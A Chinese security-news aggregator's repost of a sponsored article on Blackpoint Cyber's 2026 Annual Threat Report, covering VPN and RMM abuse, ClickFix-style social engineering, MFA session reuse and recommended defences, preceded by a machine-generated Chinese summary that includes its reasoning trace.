好的,我现在需要帮用户总结一篇文章,控制在100字以内。用户给的文章是关于Blackpoint Cyber的2026年度威胁报告的,内容涉及入侵攻击的趋势变化。 首先,我得通读整篇文章,抓住主要观点。文章提到,远程访问和可信管理工具在组织运营中很重要,同时也是入侵的起点。攻击者更多使用合法凭证和工具,而不是漏洞利用。比如SSL VPN滥用占32.8%,RMM工具滥用占30.3%。此外,社交工程占57.5%,云入侵利用MFA后的会话复用。 接下来,我需要将这些信息浓缩到100字以内。要涵盖攻击手段的变化、常用方法以及防御建议。确保语言简洁明了,不使用复杂的术语。 可能的结构:先点明报告主题,然后说明攻击者如何利用合法路径和工具,接着提到社交工程和云入侵的情况,最后简要提到防御建议。 检查字数是否在限制内,并确保没有遗漏关键点。 </think> Blackpoint Cyber的2026年度威胁报告显示,攻击者 increasingly通过合法访问路径、可信IT工具及社交工程手段入侵组织。SSL VPN滥用、RMM工具滥用及假冒CAPTCHA等钓鱼攻击成为主要入侵方式。多因素认证被绕过,云服务会话被复用。报告建议加强远程访问安全、限制未授权软件安装及应用条件访问控制以应对威胁。 2026-4-1 14:18:4 Author: www.bleepingcomputer.com(查看原文) 阅读量:3 收藏
Remote access and trusted administrative tools play a central role in how organizations operate today. According to Blackpoint Cyber’s 2026 Annual Threat Report, they are also increasingly central to how intrusions begin.
Informed by analysis of thousands of security investigations conducted during the reporting period, the report highlights a shift in attacker behavior. Rather than relying primarily on vulnerability exploitation, threat actors frequently gained access by using valid credentials, legitimate tools, and routine user-driven actions.
The report examines these patterns, documents where intrusion activity was disrupted, and presents defensive priorities derived from analyzed incident response outcomes observed throughout 2025.
Additional data and incident walkthroughs will be covered during an upcoming live webinar hosted by Blackpoint Cyber.
Key Findings From the 2026 Annual Threat Report
Attackers Are Entering Through Legitimate Access Paths
Across incidents analyzed in the report, attackers were more likely to log in using legitimate access than to exploit vulnerabilities as their primary entry point.
SSL VPN abuse accounted for 32.8 percent of all identifiable incidents, making it one of the most common initial access vectors. In many cases, threat actors authenticated using valid but compromised credentials, resulting in VPN sessions that appeared legitimate to security controls.
Once access was established, these sessions often provided broad internal reach, allowing attackers to move rapidly toward high-value systems without immediately triggering alerts.
Trusted IT Tools Are Being Used Against Organizations
The report also documents frequent abuse of legitimate Remote Monitoring and Management tools as a method of access and persistence.
RMM abuse appeared in 30.3 percent of identifiable incidents, with ScreenConnect present in more than 70 percent of rogue RMM cases. Because these tools are commonly used for standard IT administration, unauthorized installations often resembled expected activity and were difficult to distinguish without strong visibility.
The report notes that environments with multiple remote access tools in use were more likely to see rogue instances blend in with existing tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
While legitimate access paths enabled many intrusions, user interaction represented the largest driver of overall incident volume.
Fake CAPTCHA and ClickFix-style campaigns accounted for 57.5 percent of all identifiable incidents, making them the most common attack pattern documented in the report.
Rather than exploiting software vulnerabilities, these campaigns relied on deceptive prompts. Users were instructed to paste commands into the Windows Run dialog as part of what appeared to be a routine verification step. Execution used built-in Windows tools, without traditional malware downloads or exploit activity.
Cloud Intrusions Focused on Session Reuse After MFA
Multi-factor authentication was enabled in many cloud environments associated with investigated incidents, yet account compromise still occurred.
Adversary-in-the-Middle phishing accounted for approximately 16 percent of cloud account disables documented in the report. In these scenarios, MFA functioned as designed. Instead of bypassing authentication, attackers captured authenticated session tokens issued after successful MFA and reused them to access cloud services.
From the perspective of the cloud platform, this activity aligned with a legitimate authenticated session.
From Initial Access to Network Pivoting
Many of the attacks described above begin with legitimate access. What happens next is where real damage occurs.
In a recent investigation, our SOC identified a new implant called Roadk1ll, designed to pivot across systems using WebSocket-based communication and maintain access while blending into network traffic.
Join Inside the SOC Episode #002 to see how these attacks progress from initial access to full environment compromise.
What These Findings Mean for Security Teams
Across industries, environments, and attack types, the report highlights a consistent pattern: many successful intrusions relied on activity that blended into normal operations.
Rather than relying on novel exploits or advanced malware, attackers abused everyday workflows such as remote logins, trusted tools, and standard user actions. Based on the attack chains analyzed, the report identifies several defensive priorities:
- Treat remote access as high-risk, high-impact activity
- Maintain a complete inventory of approved RMM tools and remove unused or legacy agents
- Restrict unapproved software installations and limit execution from user-writable directories
- Apply Conditional Access controls that evaluate device posture, location, and session risk
These patterns were documented across frequently targeted sectors, including manufacturing, healthcare, MSPs, financial services, and construction.
For teams interested in examining how these intrusion patterns unfold, Blackpoint Cyber will review key findings, case examples, and defensive takeaways from the 2026 Annual Threat Report during an upcoming live webinar.
➡️ Register to receive the 2026 Annual Threat Report
Sponsored and written by Blackpoint Cyber.
如有侵权请联系:admin#unsafe.sh